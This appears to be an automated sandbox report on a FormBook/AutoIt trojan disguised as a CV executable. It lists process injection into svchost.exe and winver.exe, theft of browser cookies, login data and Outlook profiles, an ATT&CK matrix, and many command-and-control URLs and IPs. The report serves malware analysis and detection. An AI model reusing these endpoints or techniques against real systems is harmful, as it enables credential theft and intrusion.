                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 3924Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread APC queued: target process: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29FD008Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FB106 LogonUserW,0_2_000FB106
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000C3D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010411C SendInput,keybd_event,0_2_0010411C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001074BB mouse_event,0_2_001074BB
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_000FA66C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001071FA
                Source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: CV Lic H&S Olivetti Renzo.exe, NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525620614.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000000.2312644654.0000000000B81000.00000002.00000001.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4525672303.0000000001001000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E65C4 cpuid 0_2_000E65C4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0011091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0011091D
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0013B340 GetUserNameW,0_2_0013B340
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000F1E8E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000DDDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_81
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_XP
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_XPe
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_VISTA
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_7
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00118C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00118C4F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0011923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0011923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561737 Sample: CV Lic H&S Olivetti Renzo.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 www.rtpterbaruwaktu3.xyz 2->28 30 www.fortevision.xyz 2->30 32 18 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 CV Lic H&S Olivetti Renzo.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 NObNfBLfyhvzeH.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 winver.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 NObNfBLfyhvzeH.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.connecty.live 203.161.43.228, 50001, 50002, 50003 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 bpgroup.site 74.48.143.82, 49891, 49897, 49905 TELUS-3CA Canada 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                CV Lic H&S Olivetti Renzo.exe63%ReversingLabsWin32.Trojan.AutoitInject
                CV Lic H&S Olivetti Renzo.exe50%VirustotalBrowse
                CV Lic H&S Olivetti Renzo.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.fortevision.xyz/dash/0%Avira URL Cloudsafe
                http://www.sklad-iq.online/gdvz/?8z=42oDQZKHBS2RpvFMBZ7EzkD144AzeGctXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OiTRVapNS+KsXc4QK7u4kHLuXU5OsjWi1vwOB1/wMg5LW4+w==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.nmgzjwh.net/gb2h/?8z=EASy0dFQ3+mIcpYg1BhqvEqrUNk9skL9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXIr49oxoJg0asAGStZmb1Pixrpd6NwrYyT6qlasg7QhQxcA==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.prhmcjdz.tokyo/cm9a/0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs/f8c6/?afwXa=6nnHQlkprRILE&8z=qZLxeIvUMpnHejM96/T0f6H04zmKlOMWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgjSD2yKENm9C4V9rKFkDKUP4Cqcdi4mEHWGKUWB9ccnENVw==0%Avira URL Cloudsafe
                http://www.supernutra01.online0%Avira URL Cloudsafe
                http://www.nmgzjwh.net/gb2h/0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/?8z=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+xVd2/bH1iEsgunrHUhzfTGxWnvWCfN9FDnBntbsziOAg==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/?8z=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspdKSzY9KcXwRza5ymlGbypi62mmKXsyADr8TyMiRK3aVg==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/?8z=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglcbqILcb35Ov8GaOwyCm29DGf4fuXu0q+2HMSGnvScCRQ==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/?8z=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR1+EuxlxxaYBW6k6qKLTJOsgiw7KKI/jspabCkJT8248+oQ==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/0%Avira URL Cloudsafe
                http://www.sklad-iq.online/gdvz/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/?8z=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJq8TGuAoUt3aFnOU+z5Bj5RQAf/d4rkt/TznqZIVeIVhXw==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                http://www.prhmcjdz.tokyo/cm9a/?8z=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvlhjap6ivTCbha0++M9x+FSojTXuY7LBG4JzCnBD9GjapUw==&afwXa=6nnHQlkprRILE0%Avira URL Cloudsafe
                https://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzUR0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/0%Avira URL Cloudsafe
                http://narman.com/0%Avira URL Cloudsafe
                http://www.50food.com/u9hy/0%Avira URL Cloudsafe
                http://www.supernutra01.online/x1zr/0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs/f8c6/0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.50food.com
                147.255.21.187
                truetrue
                  unknown
                  all.wjscdn.com
                  38.54.112.227
                  truetrue
                    unknown
                    ymx01.cn
                    8.210.46.21
                    truetrue
                      unknown
                      www.nmgzjwh.net
                      172.67.168.228
                      truetrue
                        unknown
                        www.sklad-iq.online
                        194.58.112.174
                        truetrue
                          unknown
                          www.zriaraem-skiry.sbs
                          172.67.159.61
                          truetrue
                            unknown
                            www.supernutra01.online
                            172.67.220.36
                            truetrue
                              unknown
                              bpgroup.site
                              74.48.143.82
                              truetrue
                                unknown
                                www.connecty.live
                                203.161.43.228
                                truetrue
                                  unknown
                                  ssl.goentri.com
                                  13.248.221.243
                                  truetrue
                                    unknown
                                    www.tals.xyz
                                    13.248.169.48
                                    truefalse
                                      high
                                      www.ytsd88.top
                                      47.76.213.197
                                      truefalse
                                        high
                                        www.fortevision.xyz
                                        13.248.169.48
                                        truetrue
                                          unknown
                                          rtpterbaruwaktu3.xyz
                                          103.21.221.87
                                          truetrue
                                            unknown
                                            www.bpgroup.site
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.grandesofertas.fun
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.jijievo.site
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.rtpterbaruwaktu3.xyz
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.prhmcjdz.tokyo
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.tals.xyz/cpgr/?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.prhmcjdz.tokyo/cm9a/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.nmgzjwh.net/gb2h/?8z=EASy0dFQ3+mIcpYg1BhqvEqrUNk9skL9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXIr49oxoJg0asAGStZmb1Pixrpd6NwrYyT6qlasg7QhQxcA==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fortevision.xyz/dash/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fortevision.xyz/dash/?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.bpgroup.site/mlxg/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zriaraem-skiry.sbs/f8c6/?afwXa=6nnHQlkprRILE&8z=qZLxeIvUMpnHejM96/T0f6H04zmKlOMWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgjSD2yKENm9C4V9rKFkDKUP4Cqcdi4mEHWGKUWB9ccnENVw==true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sklad-iq.online/gdvz/?8z=42oDQZKHBS2RpvFMBZ7EzkD144AzeGctXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OiTRVapNS+KsXc4QK7u4kHLuXU5OsjWi1vwOB1/wMg5LW4+w==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jijievo.site/z9pi/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jijievo.site/z9pi/?8z=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglcbqILcb35Ov8GaOwyCm29DGf4fuXu0q+2HMSGnvScCRQ==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.bpgroup.site/mlxg/?8z=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+xVd2/bH1iEsgunrHUhzfTGxWnvWCfN9FDnBntbsziOAg==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.nmgzjwh.net/gb2h/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.connecty.live/6urf/?8z=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR1+EuxlxxaYBW6k6qKLTJOsgiw7KKI/jspabCkJT8248+oQ==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.tals.xyz/cpgr/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.ytsd88.top/8qt7/?8z=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspdKSzY9KcXwRza5ymlGbypi62mmKXsyADr8TyMiRK3aVg==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sklad-iq.online/gdvz/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.rtpterbaruwaktu3.xyz/mv7p/true
                                                      • Avira URL Cloud: safe
                                                      unknown
